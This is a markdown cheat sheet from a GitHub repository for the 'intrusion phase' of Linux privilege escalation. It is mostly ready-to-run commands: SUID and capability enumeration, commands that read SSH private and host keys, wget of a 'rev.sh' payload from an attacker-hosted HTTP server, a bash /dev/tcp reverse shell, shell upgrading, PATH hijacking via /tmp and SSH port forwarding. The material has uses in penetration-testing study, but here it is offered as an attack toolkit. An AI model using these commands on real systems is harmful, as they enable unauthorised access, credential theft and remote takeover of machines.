Skip to content

Latest commit

 

History

History
162 lines (119 loc) · 3.8 KB

2.2-Linux-Privilege-Escalation.md

File metadata and controls

162 lines (119 loc) · 3.8 KB

Intrusion phase (Linux)

Privilege Escalation

# find world-writeable folders
find / -perm -o w -type d 2>/dev/null
# find world-executable folders
find / -perm -o x -type d 2>/dev/null
# find development tools and supported languages:
find / -name perl* 2>/dev/null
find / -name python* 2>/dev/null
find / -name gcc* 2>/dev/null
# find files with the SUID bit
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm /4000 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
# list enabled capabilities
getcap -r / 2>/dev/null

ssh key enum

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

Can't create or write file ?

find writeable folder

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u

HTTP Server

python3 -m http.server
wget <my_ip>:8000/rev.sh

Upgrade pseudo terminal

with normal reverse shell, we don't have many luxuries such as "tab-completion" and "re-selecting" the last command executed (using the up-arrow), but importantly, we can't use commands that ask for additional input i.e. providing SSH credentials or using the substitute user command su

we can spawn another shell and begin to make it interactive:

python3 -c 'import pty; pty.spawn("/bin/bash")'

others method to expand your shell

echo os.system('/bin/bash')
/bin/sh -i

bonus (access to term commands)

export TERM=xterm

background shell

Ctrl + Z
stty raw -echo; fg

Reverse shell

/bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'

image

SUID

Sticky Bits & SUID & GUID

# Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
# SGID or SUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

image

Chmod UID

# SetUID bit enforces user ownership on an executable file	
chmod u+s
# SetGID bit enforces group ownership on files and directories
chmod g+s

image

Capatilities

getcap -r / 2>/dev/null

image

PATH

# add /tmp to PATH
export PATH=/tmp:$PATH

image

SSH Port Forwarding

Local Port

# Khi bạn truy cập http://127.0.0.1:8080 trên máy cục bộ, bạn thực sự đang truy cập http://127.0.0.1:80 trên máy từ xa (192.168.1.7).
ssh -L 8080:127.0.0.1:80 root@192.168.1.7

Remote Port

# Nếu ai đó truy cập http://192.168.1.7:8080, lưu lượng sẽ được chuyển tiếp tới http://127.0.0.1:80 trên máy cục bộ của bạn.
ssh -R 8080:127.0.0.1:80 root@192.168.1.7